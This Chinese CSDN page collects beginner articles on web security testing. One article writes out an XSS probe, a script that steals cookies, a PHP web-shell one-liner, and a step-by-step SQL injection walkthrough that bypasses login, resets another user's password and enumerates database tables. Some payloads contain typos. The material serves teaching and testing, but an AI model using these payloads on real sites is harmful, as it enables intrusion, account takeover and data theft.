安全测试_安全测试工具 - CSDN
安全测试 订阅
安全测试是在IT软件产品的生命周期中,特别是产品开发基本完成到发布阶段,对产品进行检验以验证产品符合安全需求定义和产品质量标准的过程 。 展开全文
安全测试是在IT软件产品的生命周期中,特别是产品开发基本完成到发布阶段,对产品进行检验以验证产品符合安全需求定义和产品质量标准的过程 。
信息
属    性
安全
模型
将程序看作状态机
中文名
安全测试
性    质
测试
安全测试目的
收起全文
精华内容
参与话题
  • 本课程基于Kali linux教学安全渗透测试,模拟黑客进行攻击测试
  • 安全测试

    千次阅读 2020-05-27 19:46:54
    安全测试 文章目录前言1.Web安全测试1.基本安全测试2.认证测试3.会话管理测试4.权限管理测试5.文件和目录测试链接 前言 不做文字的搬运工,多做灵感性记录 这是平时学习总结的地方,用做知识库 平时看到其他文章的...

    安全测试

    前言

    1. 不做文字的搬运工,多做灵感性记录
    2. 这是平时学习总结的地方,用做知识库
    3. 平时看到其他文章的相关知识,也会增加到这里
    4. 随着学习深入,会进行知识拆分和汇总,所以文章会随时更新
    5. 参考的文章过多,所以参考会写不全,见谅

    进行安全测试的,是需要专业的攻防技术的,这里只是做个基础了解,以后还看专攻方向


    1.Web安全测试

    1.基本安全测试

    • 各种登陆模式的安全性验证、对口令各种要求的测试

    • 用户权限(如更能限制、数据访问限制等)的验证

    • cookies 和 Session 的有效期验证等多种机制的验证

    • 敏感数据加密、数据存储安全性的验证

    • 验证系统的日志文件是否得到保护

    • 测试软件不会因在异常条件下错误而导致不安全状态

    • 其他安全漏洞的检查,如WSDigger扫描

      • get方式在URL后输入如name=<script>alter(123456)</script>,若弹出告警框,说明存在跨站漏洞;查看源文件中若包含完整的字符串<script>alter(123456)</script>,则不管有没有弹出告警框,都表明存在跨站点脚本漏洞

      • post 方式在表单的文件框中输入<script>alter(123456)</script>,若弹出警告或者查看源代码中存在输入的字符串则存在漏洞

      • SQL注入

        sql='select yhm,mm 
        	 from  users
        	 where username=' 
        如用户名中输入admin'--后,不输入密码也能登录
        

    2.认证测试

    • 登录页面是否存在验证码,不存在说明存在漏洞
    • 验证码和用户名、密码是否一次性、同时提交给服务器验证,如果分开提交,则存在漏洞
    • 在服务器端,只有在验证码校验通过以后才能进行用户和密码的检验,否则出现漏洞
    • 验证码是否为图片形式且在一张图片中,不为图片形式或不在一张图片中,说明存在漏洞
    • 请求10次观察验证码是否随机生成,如果存在一定的规律(如:5次后出现同一验证码)说明存在漏洞
    • 观察验证码图片中背景是否存在无规律的点或线条,如果背景色为纯色(如:只存在白色)说明有loud
    • 服务器不能对认证错误信息提示准确的信息,如用户名错误、密码错误等
    • 提供合理的锁定策略
    • 预防认证被绕过,如:sql注入

    3.会话管理测试

    • 用户登录后,身份信息不再由客户端提交,而不是以服务器会话信息中保存的身份信息为准
    • URL中不能携带SessionID信息
    • 登陆后的页面有明确的“退出”或“注销”按钮,注销时会话信息要清除

    4.权限管理测试

    • 横向越权:攻击者尝试访问其他拥有相同权限的用户资源
    • 纵向越权:一个低级别攻击者尝试访问高级别用户的资源

    5.文件和目录测试

    • 不存在不需要对外开放的敏感接口或者接口进行了完善的权限控制
    • 禁止获取敏感目录或者文件信息
    • 所有对目录的访问均不能打印处文件列表
    • 禁止访问和下载文档的备份
    • 不能越权获取到不该获取的文件
    • 如DirBuster

    链接

    知识目录

    展开全文
  • 一.什么是安全测试

    千次阅读 2019-05-13 16:55:47
    1.安全测试在做什么? 扫描?在很多人眼中,做安全的就是整天那个工具在哪里扫描操作,使用各种不同的工具做扫描。 是的,扫描是安全测试很重要的一部分,扫描可快速有效发现问题。扫描工具的易用性,方便性决定了...

    1.安全测试在做什么?

    扫描?在很多人眼中,做安全的就是整天那个工具在哪里扫描操作,使用各种不同的工具做扫描。

    是的,扫描是安全测试很重要的一部分,扫描可快速有效发现问题。扫描工具的易用性,方便性决定了其重要地位。但是扫描工具的局限性,程序的不够灵活等缺点也是显而易见的。不管是扫描报告的分析、漏洞的深度挖掘、测试的组织等等工作都离不开安全测试人员,所以只能说扫描工具减轻了测试人员的工作量,是安全测试的一种手段

    2.安全测试者是怎样定位自己的?

    我们经常听到一些有关安全的名称,像软件安全、信息安全、网络安全、计算机安全等一些词组,这些领域都是做安全的,那我们属于哪一个呢?

    【软件安全】往小了说就是某一个软件产品,说大了除了硬件就是软件了。

    【信息安全】看名字我们就知道关键是信息两个字,但是什么是信息呢,客户的数据还是一切有用的数据?

    【网络安全】什么是网络,网络系统硬件、软件这都是些模糊的可大可小的概念

    【计算机安全】PC?服务器?路由器?

    我们可以看到这些概念往大了说成了组成我们今天互联网的各种设备包括各种嵌入式机器、外接USB、蓝牙等设备的共同体的硬软件,以及使用、维护、管理这些东西人的整个安全问题

    在看他们的区别,他们以不同的地方为其主要关注点,或者说出发点,他们并没有明显的界限却有着自己的侧重点

    我们的侧重点是什么呢,我们产品是一个什么样的产品呢?我们有web服务、接口服务、文件服务、视频等服务,我们把他们统一称为我们的系统,那么我们就是在做这个系统的安全测试,所以我觉得我们应该定位为系统安全测试

    当然我们的系统运行中也涉及到人、涉及到硬件,此处都不是我们的关注点,我们只从软件技术的角度来识别它。那么,系统安全测试就成了区别于功能测试,和性能测试一样,单独列出来的专项测试

    3.安全的本质是什么?

    信任、人性(网络安全最大的漏洞就是人)、止损、攻防

    以上是当前网上一些主要的论点,以信任或者不信任作为本质出发点的还是占据主流的

    4.概念定义

    【敏感数据】具体的范围取决于产品具体的应用场景,产品应根据风险进行分析和判断

                          典型敏感数据包括口令、银行账号、大批量个人数据、用户通信内容和密钥等

    【个人数据】指直接通过该数据或者结合该数据与其他的信息,可识别出自然人的信息

    【匿名化】指对个人数据进行更改(单独单向散列、截短、替换等,如需保留个人数据真实值与替换值之间的对应关系,可使用对称加密或映射表方式,但密钥/映射表必须由数据所有这控制),使原有关个人信息不再能归属到一个可识别的自然人,或推理这种归属需要耗费过多、不相称的时间、费用和精力

     

     

     

    展开全文
  • 菜鸟浅谈——web安全测试

    万次阅读 多人点赞 2018-02-28 13:27:23
    本文仅为小白了解安全测试提供帮助 一:安全测试注意事项 1)要注意白帽子与黑客之间的区别 2)在挖漏洞挣外快时,注意不要使用安全扫描或暴力破解软件对上线网站进行扫描或攻击。 不要对上线网站造成破坏,不要...

    本文仅为小白了解安全测试提供帮助

    一:安全测试注意事项
    1)要注意白帽子与黑客之间的区别
    2)在挖漏洞挣外快时,注意不要使用安全扫描或暴力破解软件对上线网站进行扫描或攻击。 不要对上线网站造成破坏,不要去获取网站的数据库信息等。否则等待的不是money,而是牢狱啦~~
    二:web介绍
    1)world wide web 万维网,也被叫做www(3w),非常普遍的互联网应用,每天都有数以亿万计的web资源传输。有html,图片,音频,视频等等组成
    2)web的工作流程
    举个栗子:
    这里写图片描述
    细分流程图,安全漏洞根据客户端与服务器端的分布:
    这里写图片描述
    钓鱼:黑客构造一个跟知名网站很相似的网站,吸引用户登录,输入敏感信息,或通过邮件等验证方式,不知不觉中获得用户的登录密码之类的。
    暗链:其实“暗链”就是看不见的网站链接,“暗链”在网站中的链接做的非常隐蔽,短时间内不易被搜索引擎察觉。它和友情链接有相似之处,可以有效地提高PR值。但要注意一点PR值是对单独页面,而不是整个网站。
    暗链一般是把html的框架设置为不可见的,既00或者为负
    这里写图片描述

    xss:跨站脚本攻击。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。
    举个栗子:论坛用户在发帖时,在帖子里写了html代码。当其他用户浏览时,此段代码被执行,导致其他用户看到的东西是一些恶意的东西。
    https://www.2cto.com/article/201209/156182.html
    点击劫持:是一种视觉上的欺骗手段。大概有两种方式,一是攻击者使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作,此时用户将在不知情的情况下点击透明的iframe页面;二是攻击者使用一张图片覆盖在网页,遮挡网页原有位置的含义;

    这里写图片描述

    这里写图片描述

    CSRF:简单说, 攻击者盗用了你的身份,以你的名义发送恶意请求。

    http://www.cnblogs.com/hyddd/archive/2009/04/09/1432744.html
    http://baike.baidu.com/view/1609487.htm?fr=aladdin
    这里写图片描述

    URL跳转:http://localhost:81/url.php?url= 存在URL跳转漏洞的页面
    http://blog.csdn.net/change518/article/details/53997509

    sql注入:所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击.
    https://www.cnblogs.com/sdya/p/4568548.html

    文件上传/文件包含:上传的附件没有进行过滤,当上传的文件为危险文件时,依然可以上传成功。 比如一句话木马的php文件。 这样很容易服务器的后台被控制

    暴力破解:使用一个好的字典,利用工具,暴力破解网站的登录名和密码。 这要求字典一定要有很多常用数据。 字典也可以用python自己写。

    浏览器首先想DNS服务器发送请求,获取到ip地址,然后通过IP地址找到相应服务器
    这里写图片描述

    浏览器与服务器的通信靠 http协议。 通过发送http请求,和接收服务器端返回的http响应,来进行交互
    浏览器接收到响应信息后,通过html javascript css 等技术,把相应信息渲染成可视化的图形界面。 截止到这里,为整个web工作流程
    这里写图片描述
    三:浏览器
    1)搜索引擎
    浏览器:百度搜索,谷歌hack,bing(用于IP搜索)
    百度搜索语法:
    intitle/title:xxx 限定搜索内容在标题中
    inurl:xxx 限定搜索内容在url中
    filetype:doc 限定文件格式 例子:photoshop实用技巧 filetype:doc
    site:xxx 限定搜索范围在特定的站点中
    双引号“”和书名号《》精确匹配。 同时表达了搜索此不能拆分。 可以试一下搜手机
    -不含特定查询词。 例子:例子:电影 -qvod 或升职记 -太子妃
    +包含特定查询词
    谷歌hack搜索与百度搜索语法相近,在细节处有些不同
    必应bing搜索的语法:
    这里写图片描述
    这里写图片描述
    不同的搜索引擎对应的不同的数据库和资源。
    网络空间搜索引擎:
    这里写图片描述
    Shodan,来自于国外,点击“Details”,可查看详情信息,包括域名、IP、地址、Web技术、对外开放的端口和相应的服务。提供API接口。
    Zoomeye,来自于国内安全公司知道创宇。点击查看详情,包括IP、地址、对外开放的端口和相应的服务。提供API接口。但对中国地区的服务器IP地址做了部分隐藏处理。
    Fofa,来自于国内,提供API接口

    在线web工具:www.ipip.net 、www.cmd5.com,www.anquanquan.info
    tips:以谷歌为例。 有时安全漏洞是在前端页面出现时,可以通过禁用js或者css来定位漏洞
    禁用js方法(工具-设置-高级设置-隐私设置-内容设置):
    这里写图片描述
    禁用css方法:
    这里写图片描述

    2) 浏览器插件(特别是火狐)
    这里写图片描述

    四:需要了解的知识(不求精通,但会写简单的以及能看懂所有的代码)
    1)html
    2)javascript
    3)sql
    4)php
    5)web服务器环境
    这里写图片描述

    五:安全测试工具
    web渗透测试工具:
    AWVS ( Acunetix Web Wulnerability Scanner)是一个自动化的Web 应用程序安全测试工具,它可以扫描任何可通过Web 浏览器访问的和遵循 HTTP/HTTPS 规则的 Web站点和 Web应用程序、国内普遍简称WVS。
    WebInspect(企业级漏

    HP WebInspect 可提供快速扫描功能、广泛的安全评估范围及准确的 Web 应用程序安全扫描结果。它可以识别很多传统扫描程序检测不到的安全漏洞。利用创新的评估技术,例如同步扫描和审核 (simultaneous crawl and audit, SCA) 及并发应用程序扫描,您可以快速而准确地自动执行 Web 应用程序安全测试和 Web 服务安全测试。WebInspect是最准确和全面的自动化的Web应用程序和Web服务漏洞评估解决方案。

    AppScan

    对现代 Web 应用程序和服务执行自动化的动态应用程序安全测试(DAST) 和交互式应用程序安全测试 (IAST)。支持 Web 2.0、 JavaScript 和 AJAX 框架的全面的 JavaScript 执行引擎。涵盖 XML 和 JSON 基础架构的 SOAP 和 REST Web 服务测试支持 WSSecurity 标准、 XML 加密和 XML 签名。详细的漏洞公告和修复建议。40 多种合规性报告,包括支付卡行业数据安全标准 (PCI DSS)、支付应用程序数据安全标准 (PA-DSS)、 ISO 27001 和 ISO 27002,以及 Basel II。
    具体讲解信息,详见链接:http://blog.csdn.net/pygain/article/details/52729266
    数据库扫描漏洞工具:
    sqlmap
    Pangolin(穿山甲)
    其他工具:
    Burpsuite(重点,功能很全)
    fiddler
    Nmap(端口扫描)
    Wireshark
    工具大全:http://blog.csdn.net/zj0910/article/details/42294249
    tips:工具只是在一定程度上帮你快速搜索到一些明显的漏洞,但漏洞的具体证实仍需手工进行检验。故不要盲目的依赖工具。

    六:常见的安全漏洞
    1、XSS
    xss又叫CSS(Cross-SiteScripting),跨站脚本攻击。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。

    2、CSRF
    3、URL跳转
    4、点击劫持

    5、SQL注入
    6、命令注入
    7、文件操作漏洞

    展开全文
  • Web安全测试

    千次阅读 2018-12-04 17:29:29
    一、认证与授权 1、认证 即登录功能正常 2、权限 每个用户拥有正确的权限 3、避免未经授权的页面可以直接访问,通过认证和权限(Session),对每个页面有一...4、在手动进行安全测试时,对所有url地址在不登录...

    一、认证与授权

    1、认证  即登录功能正常

    2、权限  每个用户拥有正确的权限

    3、避免未经授权的页面可以直接访问,通过认证和权限(Session),对每个页面有一个判断。例如在知道一个页面的绝对url地址后,该页面有个session变量叫login-in,如果login-in为False时访问该页面跳转到登录页面,为True可正常访问。

    4、在手动进行安全测试时,对所有url地址在不登录时直接访问

    二、Session与Cookie

    1、避免保存敏感信息到cookie文件中。如用户名、密码

    2、作用域  不同应用系统不同作用域。下图中为单个应用系统,Path对应的是这个cookie的作用域,斜杠表示根目录,即该条cookeie作用域为整个应用系统。

    Set-Cookie: access-token=LluyJIfAggsBH_woZgQAledLq3ZJzNwOD501WuvHNdjV5JthEWw; Path=/

    三、DDOS拒绝服务攻击

    1、向服务器疯狂发送请求,导致服务器崩溃,无法进行正常处理

    2、肉鸡  远程控制多台电脑同时向服务器发请求

    3、攻击联盟  与肉鸡同样的道理,达到分布式效果。由于请求都是真实的,但是请求量过大导致服务器崩溃。服务器无法通过禁用IP、防火墙来限制,最好的解决方式,增加服务器资源。

    4、利用TCP建立连接的规则  TCP建立连接需要经历三次捂手的过程,简单描述为:①C-->S ② S-->C ③C-->S  如果三次握手成功则会建立稳定的TCP连接。根据这种规则,客户端模拟一个不存在IP地址向服务器发送TCP连接的请求,服务端在向客户端发起第二次握手时由于找不到IP地址,连接资源一直处于等待状态。连接数量过大时会导致服务器资源崩溃。

    四、文件上传漏洞

    1、文件上传的过滤:①通过后缀名过滤;②通过二进制来判断文件类型(防止修改后缀名);

    2、修改服务器核心参数,禁止脚本引擎运行系统命令;

    3、<?php system($_GET['cmd']); ?>

    将该命令写一个php文件并上传,上传后直接点击php文件,如果在windows,http://127.0.0.1:8080/?cmd=dir 显示当前目录。如果不做限制,那么就能执行任意命令。

    五、XSS跨站攻击

    1、什么是跨站攻击:XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS,XSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。

    2、如何写XSS脚本  对所有输入框做校验。

    <input type="button" value="点击" οnclick="alert('你好')" />以上一行代码在输入框输入并提交成功后,如果页面出现一个可点击按钮,表示没有对输入内容进行过滤,存在安全问题。

    3、获取用户cookie

    在将代码修改为下列一行后(在页面展示为可点击美女图片),其他用户在点击后,就直接能获取到用户cookie

    <img src="http://www.win4000.com/meinv165398.html" οnclick="document.getElementById('kw').value=document.cookie">

    六、SQL注入

    1、最通用一个攻击手段,用于关系型数据库

    2、通过SQL注入获取服务器端数据库的内容

    3、通过SQL注入修改数据库的内容

    4、php, asp, jsp, mysql, sqlserver, oracle, access都有不同的攻击方式

    登录SQL注入举例:

    在输入用户名密码后,一般系统会去数据库匹配校验,校验的可能sql猜想如下:

    select * from user where username=‘$username’ and password=‘$password’

    select username,  password from user where username=‘$username’

    if  (count() == 1)

            if (password=$password)

                    登录成功

    如果为第一种最不安全的匹配方式,修改用户名:

    $username=x' or userid=1 # '

    替换第一条的username后语句变为:

    select * from user where username=‘x' or userid=1 # ' and password=$password

    #会将后面的password校验直接注释掉

    修改用户密码:

    $username=x' ; update user set password='123456' where userid=1 #' 

    替换第一条的username后语句变为:

    select * from user where username=‘x' ; update user set password='123456' where userid=1 #' ’ and password=‘$password’

    如果页面用户名输入框限制了用户输入长度,可使用工具跳过页面校验。

    如果服务器端也没有进行校验,此时会更新userid=1的密码为123456。请求完成后,在页面用户名输入框输入x' or userid=1 # ',密码输入:123456,点击登录,如果登录成功,表示密码修改成功。如果没有登录成功, 可能的原因:①表名user猜错;②列名password、userid其中一个或两个猜错;③密码以加密保存。

    对①②中情况,只能进行多次尝试,对③,先对123456进行MD5加密后重新执行语句,然后再尝试:在页面用户名输入框输入x' or userid=1 # ',密码输入:123456,点击登录,如果登录成功,表示密码修改成功。

    实现登录SQL注入条件:

    1、服务器端没有对输入长度进行验证

    2、需要对表名、列名、加密方式进行猜错(对自身系统,可直接查看)

    利用url地址参数进行SQL注入:

    如:http://localhost/phpwind/read.php?tid=9527

    后端查询该条内容可能方式:select * from thread  where tid=9527

    通过以下三种方式进行SQL注入试探:

    1. tid=9527'  
    2. tid=9527 and 1=2
    3. tid=9527 order by 10

    如果以上三种试探页面返回对应SQL查询结果,则存在SQL注入漏洞。使用以下方式获取数据库表名和列名:

    select * from thread  where tid=9527 and 1=2 union select 1,2,3,4,5,6,7,8,9

    上一条SQL分两个查询,union之前的查询结果列的数量需要和union之后查询的数量(9)相等。执行后,会在页面显示出可执行的其中一列的结果。在能显示出查询结果的列,输入:database()、user()获取数据库名、用户名。

    如果列1为能显示查询结果的列,SQL如下:

    select * from thread  where tid=9527 and 1=2 union select database(),2,3,4,5,6,7,8,9   查询出数据库名:learn

    select * from thread  where tid=9527 and 1=2 union select user(),2,3,4,5,6,7,8,9   查询出用户名

    select * from thread  where tid=9527 and 1=2 union select table_name,2,3,4,5,6,7,8,9 from information_schem.tables where table_scheme='learn'  limit 1,1(limit 1,1表示从第2条开始显示,一共只显示1条)    获取表名:user

    select * from thread  where tid=9527 and 1=2 union select column_name,2,3,4,5,6,7,8,9 from information_schem.columns where table_scheme='learn'  and table_name='user' limit 1,1       获取user表的列名

    到这一步,已经可以把数据库的所有数据抓取下来了。

    七、暴力破解

    顾名思义,暴力破解的原理就是使用攻击者自己的用户名和密码字典,一个一个去枚举,尝试是否能够登录。因为理论上来说,只要字典足够庞大,枚举总是能够成功的!

    网上百度安全测试 暴力破解,基本都是Burp Suite的教程。

    展开全文
  • 安全测试(一)

    2019-05-08 16:35:47
    一:安全测试注意事项 1)要注意白帽子与黑客之间的区别 2)在挖漏洞挣外快时,注意不要使用安全扫描或暴力破解软件对上线网站进行扫描或攻击。 不要对上线网站造成破坏,不要去获取网站的数据库信息等。否则等待的...
  • 安全测试常用几个工具

    万次阅读 2016-09-06 20:13:25
    Nmap被用于发现网络和安全审计。据数据统计,全世界成千上万的系统管理员使用nmap发现网络、检查开放端口、管理服务升级计划,以及监视主机或服务的正常运行时间。Nmap是一种使用原始IP数据包的工具,以非常创新的方
  • 我不推荐大家去做安全测试工程师。 为什么不推荐大家去做安全测试? 今天,很多软件并没有经过专门的安全测试便运行在互联网上,它们携带着各类安全漏洞直接暴露在公众面前,其中一些漏洞甚至直指软件所承载的核心...
  • 软件安全性能测试(转载)

    万次阅读 2009-10-11 14:27:00
    近来,在我负责的公司某软件产品的最后测试工作,常常被问到这样一个问题:在做测试过程中,我们的软件产品在安全性方面考虑了多少?应该如何测评一个软件到底有多安全? 这个软件因为涉及客户商业上重要的信息资料...
  • 软件安全测试

    万次阅读 2017-07-08 23:18:44
    在软件安全测试时,运用一组好的原则来避免不安全的软件上市、避免不安全软件受攻击,就显得十分重要。  一、软件安全性测试基本概念  软件安全性测试包括程序、网络、数据库安全性测试。根据系统安全指标...
  • 11款常用的安全测试工具

    万次阅读 2019-03-15 13:51:20
    一款安全漏洞扫描工具,支持Web和移动,现在安全测试做漏洞扫描非常适用,它相当于是"探索"和"测试"的过程,最终生成很直观的测试报告,有助于研发人员分析和修复通常安全测试工具用这个,扫描...
  • 这个系列是拜读《Web安全攻防:渗透测试实战指南》之后的一些笔记和实践记录,感谢作者对我学习过程的帮助,这本书值得大家入手学习。 信息收集 1.获取真实IP 2.域名信息 1.Whois查询 Kali自带了Whois,但是...
  • 常用安全测试工具

    万次阅读 2018-02-28 14:55:54
    端口扫描:NMAP工具操作系统漏洞扫描工具:Nessus协议健壮性测试:Codenomicon、Peachweb漏洞扫描:Appscan、Burpsuite(可抓取、拦截web报文并进行修改)数据库漏洞扫描:Nessus、NGSfiddler工具:可抓取web报文,并...
  • 用户认证安全测试要考虑问题: 1. 明确区分系统中不同用户权限 2. 系统中会不会出现用户冲突 3. 系统会不会因用户的权限的改变造成混乱 4. 用户登陆密码是否是可见、可复制 5. 是否可以通过绝对途径登陆系统...
  • 第14回 容错性测试安全测试

    万次阅读 2006-10-10 18:33:00
    容错性测试安全测试容易被忽视,但这两项测试越来越现实其重要性,容错性对系统的稳定性、可靠性影响很大,而随着网络应用、电子商务、电子政务等越来越普及的同时,安全性越来越重要。容错性测试安全测试,...
  • 微信公众号开发测试帐号

    万次阅读 2018-01-10 10:33:01
    扫描关注后登录 ...填写JS接口安全域名 ,设置JS接口安全域后,通过关注该测试号,开发者即可在该域名下调用微信开放的JS接口,请阅读微信JSSDK开发文档。 注意:不知道啥原因,用自己的帐号申请测试
  • 根据机构调研,目前安全问题80%都发生在...本课程中,从web安全漏洞原理、攻击手段、测试方法、预防措施四个方面全面剖析WEB安全的点点滴滴,针对开发人员、测试人员、运维人员、网络工程师都能够起到一定的指导意义。
  • APP测试安全测试

    万次阅读 2017-05-03 22:13:53
    事情虽然解决了,但是引起该问题的一个原因是在测试中没有安全测试,而安全测试的标准,方法都没有。因此今天将之前工作中参与过的安全测试以及从网上查阅到有关安全测试的资料进行整理。有不足的之处,尽情谅解。 ...
  • 渗透测试教程(基础篇)-1

    万次阅读 多人点赞 2017-09-30 14:18:30
    渗透测试教程(基础篇) ■ 文档编号 V1.0 ■ 密级 内部使用 ■ 版本编号 ■ 日期 2016-11-10■ 版本变更记录 时间 版本 说明 修改人 2016-11-10 V1.0 新建 四盘山(525471858)目录 渗透测试教程(基础篇) 1 ...
  • 11个免费的Web安全测试工具

    万次阅读 2018-10-10 18:09:13
    转载自:...   黑测工作室 - 专注于软件安全测试技术研究!(www.AutomationQA.com) 11个免费的Web安全测试工具 1.Netsparker Community Edition(Windows) 这个程序可以检测SQL注入和跨页脚本事件...
1 2 3 4 5 ... 20
收藏数 925,518
精华内容 370,207
关键字:

安全测试